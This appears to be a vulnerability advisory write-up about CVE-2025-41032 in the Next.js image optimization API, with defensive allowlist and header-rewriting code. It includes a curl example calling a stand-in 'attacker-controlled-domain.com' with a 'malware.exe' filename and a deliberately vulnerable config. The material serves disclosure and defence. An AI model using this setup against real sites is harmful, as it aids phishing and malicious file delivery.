Nextjs, Content Injection, CVE-2025-41032 (Moderate)


The CVE-2025-41032 vulnerability resides within the Next.js image optimization API. The component fails to properly validate and sanitize the `Content-Disposition` header from responses fetched from externally configured remote image sources. When an attacker controls such a source, they can craft a malicious HTTP response containing a `Content-Disposition` header with an `attachment` directive and a user-supplied `filename` parameter. Upon receiving this response, the Next.js server would inadvertently process it and forward the header to the end-user’s browser. This action triggers an automatic file download dialog for the user, presenting a file with the attacker-chosen name and content type. This mechanism allows for the delivery of arbitrary files, such as disguised executables or HTML pages containing phishing content, effectively exploiting the trusted domain of the Next.js application to lend credibility to the malicious download.
Platform: Next.js
Version: <15.4.5, <14.2.31
Vulnerability: Content Injection
Severity: Moderate

Date: 2025-08-29

Prediction: 2025-09-05

What Undercode Says:

```bash
curl -H "Content-Disposition: attachment; filename='malware.exe'" http://attacker-controlled-domain.com/image.jpg
```

```javascript
// Next.js config (vulnerable)
module.exports = {
  images: {
    domains: ['attacker-controlled-domain.com'],
  },
}
```
How the Exploit Works:

The attacker hosts a malicious image server whose responses carry a crafted `Content-Disposition` header. When a victim visits a page that loads the "image" through the optimization API, the header is forwarded and the browser downloads the malicious file under the spoofed name.
Protection from this CVE:

Upgrade to v15.4.5 or v14.2.31. Strictly validate all entries in `images.domains` and `images.remotePatterns`. Implement a Content Security Policy (CSP).
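As an added example (not Next.js's own code or the project's fix; the allowlist host `cdn.example.com` and all function names are assumptions), this models the two controls above for an image-optimization proxy: an explicit `remotePatterns`-style allowlist for upstream fetches, and a server-chosen `Content-Disposition` that never echoes the upstream header:

```javascript
'use strict';

// Allowlist entries modelled on the shape of images.remotePatterns; the host
// and path here are constructed for this example.
const ALLOWED_PATTERNS = [
  { protocol: 'https', hostname: 'cdn.example.com', pathname: '/images/' },
];

// True only when the URL is well-formed, uses the listed protocol, matches the
// hostname exactly and starts with the listed path prefix. Anything else is
// refused, so the optimizer never fetches from an origin it was not given.
function isAllowedRemoteUrl(rawUrl, patterns = ALLOWED_PATTERNS) {
  let url;
  try { url = new URL(rawUrl); } catch { return false; }
  return patterns.some(p =>
    url.protocol === `${p.protocol}:` &&
    url.hostname === p.hostname &&
    (p.pathname === undefined || url.pathname.startsWith(p.pathname)));
}

// Build the Content-Disposition sent to the browser. The upstream header is
// accepted as a parameter only to make the point explicit: it is never used,
// so a remote origin cannot turn the response into a download or pick its name.
function buildContentDisposition(upstreamHeader, requestedName) {
  // Keep a conservative character set: no quotes, separators or control chars.
  const safe = String(requestedName || '')
    .replace(/[^A-Za-z0-9._-]/g, '_')
    .replace(/^\.+/, '')
    .slice(0, 64) || 'image';
  return `inline; filename="${safe}"`;
}

// Response headers for one optimized-image request. detectedMime is what the
// server determined from the decoded bytes, not the upstream Content-Type.
function proxyHeaders(upstreamUrl, upstreamHeaders, requestedName, detectedMime) {
  if (!isAllowedRemoteUrl(upstreamUrl)) {
    return { status: 400, headers: {} };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': detectedMime,
      'Content-Disposition': buildContentDisposition(
        upstreamHeaders['content-disposition'], requestedName),
      'X-Content-Type-Options': 'nosniff',
    },
  };
}
```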

Impact:

Phishing attacks, malicious file delivery, client-side code execution, reputation damage.


Sources:

Reported By: github.com